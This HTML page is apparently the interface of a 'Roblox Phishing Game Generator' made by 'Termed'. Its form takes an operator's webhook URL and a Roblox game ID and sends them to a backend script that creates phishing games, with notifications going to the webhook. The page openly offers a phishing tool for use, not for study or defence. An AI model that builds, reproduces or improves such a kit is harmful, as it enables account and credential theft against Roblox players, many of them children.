<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
      <meta charset="UTF-8">
  <title>Roblox Phishing</title>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="twitter:site" content="Termed">
  <meta name="twitter:title" content="Roblox - Phishing">
  <meta name="twitter:description" content="Check out Termed Roblox Game Generator">
  <meta property=og:site_name content=Termed>
  <meta name="twitter:card" content="summary_large_image">
  <meta name="twitter:image:src" content="https://media.discordapp.net/attachments/1101633632222838885/1103719961031102634/undraw_online_stats_0g94.png?width=928&height=570">
  <meta name="viewport" content="width=device-width">
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap" rel="stylesheet">

    <link rel="stylesheet" href="fonts/icomoon/style.css">

    <link rel="stylesheet" href="css/owl.carousel.min.css">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/bootstrap.min.css">
    
    <!-- Style -->
    <link rel="stylesheet" href="css/style.css">

    <title>Termed</title>
  </head>
  <body>
  

  
  <div class="content">
    <div class="container">
      <div class="row">
        <div class="col-md-6 order-md-2">
          <img src="images/undraw_online_stats_0g94.svg" alt="Image" class="img-fluid">
        </div>
        <div class="col-md-6 contents">
          <div class="row justify-content-center">
            <div class="col-md-8">
              <div class="mb-4">
              <h3>Game <strong>Generator</strong></h3>
              <p class="mb-4">Roblox Phishing Game Generator!</p>
            </div>
            <form action="../Create/api.php" method="post">
              <div class="form-group first">
                <span>Webhook</span>
                <input name="Webhook" type="text" class="form-control" id="webhook">

              </div>
              <div class="form-group last mb-4">
                <span>Game ID</span>
                <input name="ID" type="username" class="form-control" id="game">
                
              </div>
              
              <div class="d-flex mb-5 align-items-center">
                <label class="control control--checkbox mb-0"><span class="caption">Notifier to my webhook</span>
                  <input type="checkbox" checked="checked" required/>
                  <div class="control__indicator"></div>
                </label>
                <span class="ml-auto"><a href="#" class="forgot-pass">Dashboard Page Soon</a></span> 
              </div>

              <input type="submit" value="Create" class="btn text-white btn-block btn-primary">

              <span class="d-block text-left my-4 text-muted">Made By Termed</span>
            </form>
            </div>
          </div>
          
        </div>
        
      </div>
    </div>
  </div>

  
    <script src="js/jquery-3.3.1.min.js"></script>
    <script src="js/popper.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
    <script src="js/main.js"></script>
  </body>
</html>